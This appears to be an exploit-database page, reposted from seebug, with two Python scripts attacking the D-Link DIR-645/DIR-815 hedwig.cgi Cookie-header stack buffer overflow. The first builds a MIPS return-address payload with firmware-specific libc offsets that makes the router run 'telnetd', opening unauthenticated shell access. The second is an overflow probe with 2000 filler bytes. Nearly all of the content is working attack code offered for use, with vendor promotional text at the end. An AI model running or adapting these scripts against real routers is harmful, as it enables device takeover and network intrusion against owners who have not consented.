Lucene search
K

D-Link hedwig.cgi Buffer Overflow in Cookie Header

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 74 Views

D-Link hedwig.cgi Buffer Overflow exploit for DIR-645/DIR-815 vulnerability using Pytho

Code

                                                #!/usr/bin/env python
#####################################################################################
# Exploit for the DIR-645/DIR-815 hedwig.cgi stack based buffer overflow
#vulnerability. # 
#
## NimdaKey     #test# # 06-12-2014
#####################################################################################

import sys
import time
import string
import socket
from random import Random
import urllib, urllib2, httplib

class MIPSPayload:
    BADBYTES = [0x00]
    LITTLE = "little"
    BIG = "big"
    FILLER = "A"
    BYTES = 4

    def __init__(self, libase=0, endianess=LITTLE, badbytes=BADBYTES):
        self.libase = libase
        self.shellcode = ""
        self.endianess = endianess
        self.badbytes = badbytes
        
    def rand_text(self, size):
        str = ''
        chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
        length = len(chars) - 1
        random = Random()
        for i in range(size):
            str += chars[random.randint(0,length)]
        return str

    def Add(self, data):
        self.shellcode += data
        
    def Address(self, offset, base=None):
        if base is None:
            base = self.libase
        return self.ToString(base + offset)
    
    def AddAddress(self, offset, base=None):
        self.Add(self.Address(offset, base))
        
    def AddBuffer(self, size, byte=FILLER):
        self.Add(byte * size)
        
    def AddNops(self, size):
        if self.endianess == self.LITTLE:
            self.Add(self.rand_text(size))
        else:
            self.Add(self.rand_text(size))
            
    def ToString(self, value, size=BYTES):
        data = ""
        for i in range(0, size):
            data += chr((value >> (8*i)) & 0xFF)
        if self.endianess != self.LITTLE:
            data = data[::-1]
        print data
        return data
    
    def Build(self):
        count = 0
        for c in self.shellcode:
            for byte in self.badbytes:
                if c == chr(byte):
                    raise Exception("Bad byte found in shellcode at offset %d: 0x%.2X" % (count, byte))
            count += 1
        return self.shellcode
    
    def Print(self, bpl=BYTES):
        i = 0
        for c in self.shellcode:
            if i == 4:
                print ""
                i = 0
            sys.stdout.write("\\x%.2X" % ord(c))
            sys.stdout.flush()
            if bpl > 0:
                i += 1
        print "\n"

class HTTP:
    HTTP = 'http'

    def __init__(self, host, proto=HTTP, verbose=False):
        self.host = host
        self.proto = proto
        self.verbose = verbose
        self.encode_params = True

    def Encode(self, data):
        #just for DIR645
        if type(data) == dict:
            pdata = []
            for k in data.keys():
                pdata.append(k + '=' + data[k])
            data = pdata[1] + '&' + pdata[0]
        else:
            data = urllib.quote_plus(data)
        return data
                
    def Send(self, uri, headers={}, data=None, response=False,encode_params=True):
        html = ""
        if uri.startswith('/'):
            c = ''
        else:
            c = '/'

        url = '%s://%s' % (self.proto, self.host)
        uri = '/%s' % uri
        if data is not None:
            data = self.Encode(data)
        #print data
        if self.verbose:
            print url
        httpcli = httplib.HTTPConnection(self.host, 80, timeout=10)
        httpcli.request('POST',uri,data,headers=headers)
        response=httpcli.getresponse()
        #print response.status
        print response.read()

if __name__ == '__main__':
    libc = 0x2aaf8000#0x40854000#
    target = {
        "1.03"  :   [
            0x531ff,
            0x158c8,
            0x159cc,
            ],
        "815-1.01"  :   [
            0x531ff,
            0x158c8,
            0x159cc,
            ],
        "test"  :   [
            0x1994C444,
            0x1994C444,
            0x1994C444,
            ],
        }
    
    v = '815-1.01'
    cmd = 'telnetd'
    ip = '192.168.0.1'

    payload = MIPSPayload(endianess="little", badbytes=[0x0d, 0x0a])

    payload.AddNops(973)                # filler
    payload.AddAddress(target[v][0], base=libc) # $s0
    payload.AddNops(4)                            # $s1
    payload.AddNops(4)                            # $s2
    payload.AddNops(4)                            # $s3
    payload.AddNops(4)                            # $s4
    payload.AddAddress(target[v][2], base=libc) # $s5 
    payload.AddNops(4)                            # unused($s6)
    payload.AddNops(4)                            # unused($s7)
    payload.AddNops(4)                            # unused($gp)
    payload.AddAddress(target[v][1], base=libc) # $ra
    payload.AddNops(4)                            # fill
    payload.AddNops(4)                            # fill
    payload.AddNops(4)                            # fill
    payload.AddNops(4)                            # fill
    payload.Add(cmd)                # shellcode

    pdata = {
        'uid'       :   'test',
        'password'  :   'AbC',
        }
    #open('t','w').write(payload.Build())
    #sys.exit()
    #print len(payload.Build())
    header = {
        'Cookie'        : 'uid='+payload.Build(),
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type'  : 'application/x-www-form-urlencoded',
        'User-Agent'    : 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'
        }
    
    try:
        HTTP(ip).Send('hedwig.cgi', data=pdata,headers=header,encode_params=False,response=True)
        print '[+] exploit works !!'
    except httplib.BadStatusLine:
        print "Payload deliverd."
    except Exception,e:
        print "2Payload delivery failed: %s" % str(e)
        



#!/usr/bin/env python
#####################################################################################
# Exploit for the DIR-645 , execute path test 
#
# # Tested against firmware versions 1.03. # #
# NimdaKey # # 06-Febru-2014
#####################################################################################

'''
return result:
DIR645:
<?xml version="1.0" encoding="utf-8"?>
<hedwig>
    <result>OK</result>
    <node></node>
    <message>No modules for Hedwig</message>
</hedwig>
DIR815:
HTTP Error 500: Internal Server Error
'''
import sys
import string
import socket
from random import Random
import urllib, urllib2, httplib


class HTTP:

    HTTP = "http"
    HTTPS = "https"

    def __init__(self, host, proto=HTTP, verbose=False):
        self.host = host
        self.proto = proto
        self.verbose = verbose
        self.encode_params = True

    def Encode(self, string):
        return urllib.quote_plus(string)

    def Send(self, uri, headers={}, data=None, response=False,encode_params=True):
        html = ""

        if uri.startswith('/'):
            c = ''
        else:
            c = '/'

        url = '%s://%s%s%s' % (self.proto, self.host, c, uri)
        if self.verbose:
            print url

        if data is not None:
            data = urllib.unquote(urllib.urlencode(data))
        req = urllib2.Request(url, data,headers)
        rsp = urllib2.urlopen(req)
        
        if response:
            html = rsp.read()
            #print rsp.status
            print html
        return html

if __name__ == '__main__':

    ip='192.168.0.1'
    pdata = {
                'password'      : '123',
                'uid'       : '3Ad4'
    }
    
    #print payload.Print()
    header = {
                'Cookie'        : 'uid='+'A'*2000,
                'Accept-Encoding': 'gzip, deflate',
                'Connection'    : 'Keep-Alive',
                'User-Agent'    : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)'
                }
    
    try:
        HTTP(ip).Send('hedwig.cgi', data=pdata,headers=header,encode_params=False,response=True)
    except httplib.BadStatusLine:
        print "Payload delivered."
    except Exception, e:
        print "Payload delivery failed: %s" % str(e)

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
74